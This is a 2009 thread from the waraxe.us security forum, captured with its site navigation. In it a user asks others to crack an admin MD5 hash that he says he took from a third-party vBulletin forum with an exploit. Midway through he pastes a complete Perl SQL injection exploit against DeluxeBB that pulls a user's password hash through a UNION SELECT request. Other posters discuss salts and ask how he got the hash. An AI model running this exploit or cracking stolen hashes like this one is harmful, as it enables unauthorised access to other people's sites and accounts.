Waraxe IT Security Portal
Login or Register
January 23, 2026
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 105
Members: 0
Total: 105
Full disclosure
Re: Multiple Security Misconfigurations and Customer Enumeration Exposure in Convercent Whistleblowing Platform (EQS Group)
OpenMetadata <= 1.11.3 Authenticated SQL Injection
[REVIVE-SA-2026-001] Revive Adserver Vulnerabilities
Defense in depth -- the Microsoft way (part 95): the (shared)"Start Menu" is dispensable
Re: Multiple Security Misconfigurations and CustomerEnumeration Exposure in Convercent Whistleblowing Platform(EQS Group)
RIOT OS 2026.01-devel-317 Stack-Based Buffer Overflow in RIOT ethos Serial Frame Parser
RIOT OS 2026.01-devel-317 Stack-Based Buffer Overflow in tapslip6 Utility via Unbounded Device Path Construction
TinyOS 2.1.2 Stack-Based Buffer Overflow in mcp2200gpio
TinyOS 2.1.2 printfUART Global Buffer Overflow via UnboundedFormat Expansion
KL-001-2026-01: yintibao Fun Print Mobile Unauthorized Access via Context Hijacking
Multiple Security Misconfigurations and Customer Enumeration Exposure in Convercent Whistleblowing Platform (EQS Group)
Panda3d v1.10.16 Uncontrolled Format String in Panda3D egg-mkfont Allows Stack Memory Disclosure
Panda3d v1.10.16 egg-mkfont Stack Buffer Overflow
Panda3d v1.10.16 deploy-stub Unbounded Stack Allocation Leading to Uninitialized Memory
MongoDB v8.3.0 Integer Underflow in LMDB mdb_load
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> MD5 hashes -> PLZ HELP !! CRACK ADMIN PASSWORD !! Goto page 1, 2Next
Post new topicReply to topic View previous topic :: View next topic
PLZ HELP !! CRACK ADMIN PASSWORD !!
PostPosted: Sat Jan 24, 2009 10:16 am Reply with quote
BenMix2
Advanced user
Advanced user
Joined: Jan 08, 2009
Posts: 65




I have admin MD5 hash from this forum: www.********.net
its vbulletin 3.6.8 and i Dont know how i creat salt..

Here is the hash: 86139dbe2f4b548f11a61a44d3289be1

PLz crack and give me the password =[

(sorry my bad english)

[edited by waraxe - do not post here real URL-s!]
View user's profile Send private message
PostPosted: Sat Jan 24, 2009 1:26 pm Reply with quote
gyan007
Advanced user
Advanced user
Joined: Oct 17, 2008
Posts: 106




No salt = no crack!
View user's profile Send private message
PostPosted: Sat Jan 24, 2009 1:31 pm Reply with quote
BenMix2
Advanced user
Advanced user
Joined: Jan 08, 2009
Posts: 65




but how i creat\find salt?
I even do not know what this
View user's profile Send private message
PostPosted: Sun Jan 25, 2009 3:44 pm Reply with quote
BenMix2
Advanced user
Advanced user
Joined: Jan 08, 2009
Posts: 65




*UP*

Plz help Sad
View user's profile Send private message
PostPosted: Sun Jan 25, 2009 4:51 pm Reply with quote
x3roconf_
Advanced user
Advanced user
Joined: May 01, 2008
Posts: 101




Do NOT post urls to vuln sites. It's not allowed here for security reasons. Smile also I would like to ask how you got that hash? If you were able to get that hash getting salt is not a big problem. Wink
View user's profile Send private message
PostPosted: Sun Jan 25, 2009 5:08 pm Reply with quote
BenMix2
Advanced user
Advanced user
Joined: Jan 08, 2009
Posts: 65




But what this is salt?

i have hash from exploit script..
View user's profile Send private message
PostPosted: Sun Jan 25, 2009 5:47 pm Reply with quote
gyan007
Advanced user
Advanced user
Joined: Oct 17, 2008
Posts: 106




BenMix2 wrote:
But what this is salt?

i have hash from exploit script..


Google u dumbass! http://en.wikipedia.org/wiki/Salt_(cryptography)
View user's profile Send private message
PostPosted: Wed Jan 28, 2009 2:15 pm Reply with quote
BenMix2
Advanced user
Advanced user
Joined: Jan 08, 2009
Posts: 65




Please you do this i only have the hash =[

hare the link: http://ixtazy.net

plz Sad
View user's profile Send private message
PostPosted: Wed Jan 28, 2009 4:43 pm Reply with quote
tehhunter
Valuable expert
Valuable expert
Joined: Nov 19, 2008
Posts: 261




No. It is made 88^3 times harder to find a password without a salt and frankly I don't even want to try configuring a program for such a fruitless task. You're out of luck unless we get the accompanying salt.
View user's profile Send private message
PostPosted: Wed Jan 28, 2009 5:40 pm Reply with quote
BenMix2
Advanced user
Advanced user
Joined: Jan 08, 2009
Posts: 65




but How I will obtain a salt?

plz give me a guide Sad Sad Sad
View user's profile Send private message
PostPosted: Wed Jan 28, 2009 5:49 pm Reply with quote
tehhunter
Valuable expert
Valuable expert
Joined: Nov 19, 2008
Posts: 261




BenMix2 wrote:
but How I will obtain a salt?

plz give me a guide Sad Sad Sad
First you gotta tell us how you got this hash so we know how to help you.
View user's profile Send private message
PostPosted: Wed Jan 28, 2009 6:02 pm Reply with quote
BenMix2
Advanced user
Advanced user
Joined: Jan 08, 2009
Posts: 65




i have the hash from this script:
Code:
#!/usr/bin/perl
use IO::Socket;

print q{
############################## ########################
# DeluxeBB Remote SQL Injection Exploit #
# vbulletin Remote SQL Injection Exploit #
############################## ########################
};
if (!$ARGV[2]) {
print q{
Usage: perl dbbxpl.pl host /directory/ victim_userid
perl dbbxpl.pl www.nUBo.com /forum/ 1

};
}

$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "misc.php?sub=profile&name=0') +UNION+SELECT+0,pass,0,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0+FROM%20deluxebb_u sers%20WHERE%20(uid='".$user ;

print "[~] PREPARE TO CONNECT...\r\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";

print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "Password Hash is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";
}
exit();
}
}
print "------------------------------------------------------------------------------------------------\r\n";


plz help me now Sad
View user's profile Send private message
PostPosted: Wed Jan 28, 2009 6:05 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




If it's DeluxeBB, then there is no salt, just plain old md5.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jan 28, 2009 6:22 pm Reply with quote
one23
Advanced user
Advanced user
Joined: Dec 12, 2008
Posts: 98




EDIT :

I think Waraxe iS Right !


Last edited by one23 on Wed Jan 28, 2009 6:27 pm; edited 2 times in total
View user's profile Send private message
PostPosted: Wed Jan 28, 2009 6:22 pm Reply with quote
BenMix2
Advanced user
Advanced user
Joined: Jan 08, 2009
Posts: 65




waraxe wrote:
If it's DeluxeBB, then there is no salt, just plain old md5.

its no DeluxeBB this is vbulletin.

plz crack it Sad
View user's profile Send private message
PLZ HELP !! CRACK ADMIN PASSWORD !!
www.waraxe.us Forum Index -> MD5 hashes
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 2
Goto page 1, 2Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.051 Seconds